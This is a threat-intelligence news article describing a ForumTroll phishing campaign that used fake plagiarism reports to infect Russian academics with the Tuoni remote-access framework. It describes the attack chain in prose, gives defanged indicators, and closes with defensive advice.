The Plagiarism Trap: How ForumTroll APT is Holding Academic Careers Hostage to Deploy Spyware
In October 2025, experts at Kaspersky Lab uncovered a new wave of targeted attacks attributed to the ForumTroll group. Whereas earlier campaigns primarily focused on organizations, this iteration shifted its attention to individuals—political scientists, international relations specialists, and economists affiliated with leading Russian universities and research institutions. The attackers used lure emails alleging the discovery of plagiarism and inviting recipients to download a supposed “verification report.”
The messages were sent from the address support@e-library[.]wiki. The domain e-library[.]wiki hosted a counterfeit website that closely mimicked the design of the legitimate eLibrary digital library (the genuine site being elibrary.ru). Each email contained a personalized link to access the report; clicking it triggered the download of a ZIP archive named after the recipient’s full name, reinforcing the impression of a targeted and “official” inquiry.
Inside the archive were a folder named .Thumbs containing numerous ordinary image files with Russian-language titles, alongside a shortcut (.lnk) file also bearing the recipient’s name. Researchers believe the images were included as a decoy to make the archive appear less suspicious. When the shortcut was opened, a PowerShell script executed, downloading and launching the malicious payload. At the same time, a decoy PDF was displayed—a blurred “report” from a plagiarism-checking system that contained virtually no meaningful information and served solely to mask the infection.
To establish persistence, the attackers employed a COM hijacking technique. The downloaded DLL was saved within the user’s profile and registered in the system registry to ensure repeated execution, including after reboots. According to the report, the final payload was the commercial Tuoni framework, which is used legitimately for security testing but was repurposed here to grant remote access to victims’ devices and enable subsequent activity within their networks.
Kaspersky Lab also highlights the meticulous preparation of the attackers’ infrastructure. The malicious domain was registered as early as March 2025, while artifacts on the fake website indicate preparatory work dating back to at least December 2024. The attackers limited repeated downloads to hinder analysis and displayed different messages depending on the operating system, encouraging users to retry from Windows. Command-and-control servers were hosted within the fastly.net network. At the time of publication, the fraudulent site had been taken down.
Experts estimate that ForumTroll has been targeting individuals in Russia and Belarus since at least 2022. Kaspersky researcher Georgy Kucherín warns that academics are particularly vulnerable due to their publicly available contact information, and that emails accusing them of plagiarism can provoke anxiety and prompt rash actions. To mitigate the risk, he advises deploying security software on all devices and carefully verifying senders and links before opening attachments or following URLs.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
